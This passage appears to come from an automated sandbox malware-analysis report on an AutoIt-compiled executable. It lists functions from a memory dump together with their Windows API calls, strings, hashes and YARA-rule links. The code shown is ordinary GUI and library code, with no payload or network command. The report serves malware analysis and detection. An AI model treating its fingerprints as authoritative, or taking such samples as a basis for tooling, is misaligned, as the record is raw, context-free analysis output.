                                                  • SelectObject.GDI32(?,?), ref: 00C4AA8F
                                                  • DeleteObject.GDI32(?), ref: 00C4AA94
                                                  • SetTextColor.GDI32(?,?), ref: 00C4AA9A
                                                  • SetBkColor.GDI32(?,?), ref: 00C4AAA4
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                  • String ID:
                                                  • API String ID: 1996641542-0
                                                  • Opcode ID: 57b0ea774cae5658d71e8e8d7602ae98f9bce11f7cbb49beeecf20e0d4f98767
                                                  • Instruction ID: a58bb7da1203cafede9c56aabc89a390f2a04a92b0aae7345b109be3ea7daef8
                                                  • Opcode Fuzzy Hash: 57b0ea774cae5658d71e8e8d7602ae98f9bce11f7cbb49beeecf20e0d4f98767
                                                  • Instruction Fuzzy Hash: FE513A75900208EFDB119FA4DC48FAEBBB9FB49320F114629F911AB2A1D7719A41DF90
                                                  Function 00C489D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00C48AC1
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C48AD2
                                                  • CharNextW.USER32(0000014E), ref: 00C48B01
                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00C48B42
                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00C48B58
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C48B69
                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00C48B86
                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00C48BD8
                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00C48BEE
                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C48C1F
                                                  • _memset.LIBCMT ref: 00C48C44
                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00C48C8D
                                                  • _memset.LIBCMT ref: 00C48CEC
                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C48D16
                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00C48D6E
                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 00C48E1B
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00C48E3D
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C48E87
                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C48EB4
                                                  • DrawMenuBar.USER32(?), ref: 00C48EC3
                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00C48EEB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                  • String ID: 0
                                                  • API String ID: 1073566785-4108050209
                                                  • Opcode ID: 81a66b096b50dd778734d17adeb55005f999d6aca5cb5c8322586c02f026e11f
                                                  • Instruction ID: d95ca8dc465735452b9ea3da7ade6e05f0176d80f5d5718acf638c306b3e5c8d
                                                  • Opcode Fuzzy Hash: 81a66b096b50dd778734d17adeb55005f999d6aca5cb5c8322586c02f026e11f
                                                  • Instruction Fuzzy Hash: 89E17274901218AFDF209F55CC84FEE7BB9FF06710F10815AF925AA190DBB09A89DF60
                                                  Function 00C4488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCursorPos.USER32(?), ref: 00C449CA
                                                  • GetDesktopWindow.USER32 ref: 00C449DF
                                                  • GetWindowRect.USER32(00000000), ref: 00C449E6
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00C44A48
                                                  • DestroyWindow.USER32(?), ref: 00C44A74
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C44A9D
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C44ABB
                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00C44AE1
                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 00C44AF6
                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00C44B09
                                                  • IsWindowVisible.USER32(?), ref: 00C44B29
                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00C44B44
                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00C44B58
                                                  • GetWindowRect.USER32(?,?), ref: 00C44B70
                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00C44B96
                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 00C44BB0
                                                  • CopyRect.USER32(?,?), ref: 00C44BC7
                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00C44C32
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                  • String ID: ($0$tooltips_class32
                                                  • API String ID: 698492251-4156429822
                                                  • Opcode ID: 0a884ad46656503c490da1e1558e9779c4c5a89790c1f730b47beaf15e99c0db
                                                  • Instruction ID: 6a23fe7d520f8e73b3c96a980ac068a6dfd3f0acaa0f44b6be1d30b8c22d666c
                                                  • Opcode Fuzzy Hash: 0a884ad46656503c490da1e1558e9779c4c5a89790c1f730b47beaf15e99c0db
                                                  • Instruction Fuzzy Hash: BCB18A71604340AFDB08DF64C888B6ABBE4FF89310F10891CF9999B2A1DB71ED05CB95
                                                  Function 00C2449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C244AC
                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C244D2
                                                  • _wcscpy.LIBCMT ref: 00C24500
                                                  • _wcscmp.LIBCMT ref: 00C2450B
                                                  • _wcscat.LIBCMT ref: 00C24521
                                                  • _wcsstr.LIBCMT ref: 00C2452C
                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C24548
                                                  • _wcscat.LIBCMT ref: 00C24591
                                                  • _wcscat.LIBCMT ref: 00C24598
                                                  • _wcsncpy.LIBCMT ref: 00C245C3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                  • API String ID: 699586101-1459072770
                                                  • Opcode ID: 10897f0963a655141dff82c2ea2631157ed1977e74b35764f9bac5bbc7b00866
                                                  • Instruction ID: deb467d3d86072197dfb7ec1c267d8d6cd9eb7f1d1afcf58f2e72fdd8d06041e
                                                  • Opcode Fuzzy Hash: 10897f0963a655141dff82c2ea2631157ed1977e74b35764f9bac5bbc7b00866
                                                  • Instruction Fuzzy Hash: F6410631A402517BDB14BB769C07FBF77ECEF46710F0040BAFA05E6182EB74AA0196A5
                                                  Function 00BC27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BC28BC
                                                  • GetSystemMetrics.USER32(00000007), ref: 00BC28C4
                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BC28EF
                                                  • GetSystemMetrics.USER32(00000008), ref: 00BC28F7
                                                  • GetSystemMetrics.USER32(00000004), ref: 00BC291C
                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00BC2939
                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00BC2949
                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00BC297C
                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00BC2990
                                                  • GetClientRect.USER32(00000000,000000FF), ref: 00BC29AE
                                                  • GetStockObject.GDI32(00000011), ref: 00BC29CA
                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BC29D5
                                                    • Part of subcall function 00BC2344: GetCursorPos.USER32(?), ref: 00BC2357
                                                    • Part of subcall function 00BC2344: ScreenToClient.USER32(00C857B0,?), ref: 00BC2374
                                                    • Part of subcall function 00BC2344: GetAsyncKeyState.USER32(00000001), ref: 00BC2399
                                                    • Part of subcall function 00BC2344: GetAsyncKeyState.USER32(00000002), ref: 00BC23A7
                                                  • SetTimer.USER32(00000000,00000000,00000028,00BC1256), ref: 00BC29FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                  • String ID: AutoIt v3 GUI
                                                  • API String ID: 1458621304-248962490
                                                  • Opcode ID: 029f1243d6d7c6a3114b246b879b2c80c719b4e43265bc5edad54f3063c28d21
                                                  • Instruction ID: 85b57e122864f3f9b9b64578f39cd756b18a5671f98029d05037099059db62fd
                                                  • Opcode Fuzzy Hash: 029f1243d6d7c6a3114b246b879b2c80c719b4e43265bc5edad54f3063c28d21
                                                  • Instruction Fuzzy Hash: CBB17B75A4020AEFDB14DFA8DD85FAE7BF4FB08311F104269FA15A72A0DB74A841CB54
                                                  Function 00C1A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00C1A47A
                                                  • __swprintf.LIBCMT ref: 00C1A51B
                                                  • _wcscmp.LIBCMT ref: 00C1A52E
                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C1A583
                                                  • _wcscmp.LIBCMT ref: 00C1A5BF
                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00C1A5F6
                                                  • GetDlgCtrlID.USER32(?), ref: 00C1A648
                                                  • GetWindowRect.USER32(?,?), ref: 00C1A67E
                                                  • GetParent.USER32(?), ref: 00C1A69C
                                                  • ScreenToClient.USER32(00000000), ref: 00C1A6A3
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00C1A71D
                                                  • _wcscmp.LIBCMT ref: 00C1A731
                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00C1A757
                                                  • _wcscmp.LIBCMT ref: 00C1A76B
                                                    • Part of subcall function 00BE362C: _iswctype.LIBCMT ref: 00BE3634
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                  • String ID: %s%u
                                                  • API String ID: 3744389584-679674701
                                                  • Opcode ID: 6e98cba361fdbdfcc84673882c635fedf1c1145995b785408dc465ad80581769
                                                  • Instruction ID: 41e4d5dfe851e1415f95e050e27cf6bc6fa42987531a00d4530203811c35bf3c
                                                  • Opcode Fuzzy Hash: 6e98cba361fdbdfcc84673882c635fedf1c1145995b785408dc465ad80581769
                                                  • Instruction Fuzzy Hash: 7FA1C271205606AFD715DF60C884FEAB7E8FF45314F048529F9A9C2190DB30EA86DB92
                                                  Function 00C1AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 00C1AF18
                                                  • _wcscmp.LIBCMT ref: 00C1AF29
                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 00C1AF51
                                                  • CharUpperBuffW.USER32(?,00000000), ref: 00C1AF6E
                                                  • _wcscmp.LIBCMT ref: 00C1AF8C
                                                  • _wcsstr.LIBCMT ref: 00C1AF9D
                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00C1AFD5
                                                  • _wcscmp.LIBCMT ref: 00C1AFE5
                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 00C1B00C
                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00C1B055
                                                  • _wcscmp.LIBCMT ref: 00C1B065
                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 00C1B08D
                                                  • GetWindowRect.USER32(00000004,?), ref: 00C1B0F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                  • String ID: @$ThumbnailClass
                                                  • API String ID: 1788623398-1539354611
                                                  • Opcode ID: c05ed8b5d8e4cbcfb6df01832ea3cd138aa480ec8b9ffa343bebfd9046def4c2
                                                  • Instruction ID: be30a1fa309d4d50e8ba4fb67d7c1db05b8d9fd90fe75e15489bdb44d0003006
                                                  • Opcode Fuzzy Hash: c05ed8b5d8e4cbcfb6df01832ea3cd138aa480ec8b9ffa343bebfd9046def4c2
                                                  • Instruction Fuzzy Hash: 0781C171108205AFDB00DF11C885FEA7BE8FF46714F1484AAFD958A092DB34DE8ADB61
                                                  Function 00C1ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                  • API String ID: 1038674560-1810252412
                                                  • Opcode ID: 2e79c04a09a2597555abf21e5e6b7b43cb8e40eb04f9600f3582a0d1b39abbdc
                                                  • Instruction ID: bf93a0375d5e93ae269c0f7b9d84de5fe01229ee36e2b2c9b07585c576a18f8a
                                                  • Opcode Fuzzy Hash: 2e79c04a09a2597555abf21e5e6b7b43cb8e40eb04f9600f3582a0d1b39abbdc
                                                  • Instruction Fuzzy Hash: A731A331A48209ABEA10FB65DE13FEE77E4AF11720F2041B9F455710D1EF626F44EA92
                                                  Function 00C34FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 00C35013
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00C3501E
                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00C35029
                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 00C35034
                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 00C3503F
                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 00C3504A
                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 00C35055
                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 00C35060
                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 00C3506B
                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 00C35076
                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00C35081
                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 00C3508C
                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00C35097
                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 00C350A2
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00C350AD
                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00C350B8
                                                  • GetCursorInfo.USER32(?), ref: 00C350C8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Cursor$Load$Info
                                                  • String ID:
                                                  • API String ID: 2577412497-0
                                                  • Opcode ID: 204be6d255d48f27121eeed48200017b489ece451a3d87c741173ec03750da8d
                                                  • Instruction ID: 616533f7dcd1d8313f351d7f38baf1e669db4ff84900b635600b9be0088cf773
                                                  • Opcode Fuzzy Hash: 204be6d255d48f27121eeed48200017b489ece451a3d87c741173ec03750da8d
                                                  • Instruction Fuzzy Hash: CA3105B1D483196ADF109FB68C8995FBFE8FF04750F50452AA51DE7280DA7965008F91
                                                  Function 00C4A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C4A259
                                                  • DestroyWindow.USER32(?,?), ref: 00C4A2D3
                                                    • Part of subcall function 00BC7BCC: _memmove.LIBCMT ref: 00BC7C06
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C4A34D
                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C4A36F
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C4A382
                                                  • DestroyWindow.USER32(00000000), ref: 00C4A3A4
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00BC0000,00000000), ref: 00C4A3DB
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C4A3F4
                                                  • GetDesktopWindow.USER32 ref: 00C4A40D
                                                  • GetWindowRect.USER32(00000000), ref: 00C4A414
                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C4A42C
                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C4A444
                                                    • Part of subcall function 00BC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00BC25EC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                  • String ID: 0$tooltips_class32
                                                  • API String ID: 1297703922-3619404913
                                                  • Opcode ID: 0a312f1c2e396238c1a37a5235bd43473118d0193f381650855c50d002269f3e
                                                  • Instruction ID: 1d15b9ef73f5a3ff897618db085c41f41bee062fef214c0ce3ec230bc20818a7
                                                  • Opcode Fuzzy Hash: 0a312f1c2e396238c1a37a5235bd43473118d0193f381650855c50d002269f3e
                                                  • Instruction Fuzzy Hash: 0771BF74180205AFD725CF28CC49FAA7BF9FB89304F04452DF995872A1D7B0EA02CB56
                                                  Function 00C4C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623
                                                  • DragQueryPoint.SHELL32(?,?), ref: 00C4C627
                                                    • Part of subcall function 00C4AB37: ClientToScreen.USER32(?,?), ref: 00C4AB60
                                                    • Part of subcall function 00C4AB37: GetWindowRect.USER32(?,?), ref: 00C4ABD6
                                                    • Part of subcall function 00C4AB37: PtInRect.USER32(?,?,00C4C014), ref: 00C4ABE6
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00C4C690
                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C4C69B
                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C4C6BE
                                                  • _wcscat.LIBCMT ref: 00C4C6EE
                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C4C705
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00C4C71E
                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00C4C735
                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00C4C757
                                                  • DragFinish.SHELL32(?), ref: 00C4C75E
                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C4C851
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                  • API String ID: 169749273-3440237614
                                                  • Opcode ID: f4ca4c03a37defccdbc2f86cb3159e2fe633e4a4f2f11787dae16763aa890b6c
                                                  • Instruction ID: fdce1233e6435cfcc94d81a4db830e0429709a22df80c7c028fe415757ee6885
                                                  • Opcode Fuzzy Hash: f4ca4c03a37defccdbc2f86cb3159e2fe633e4a4f2f11787dae16763aa890b6c
                                                  • Instruction Fuzzy Hash: FF615671108304AFC701EF64CC85EAFBBE8FF89750F00496EF595921A1DB70AA49CB66
                                                  Function 00C44392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 00C44424
                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C4446F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
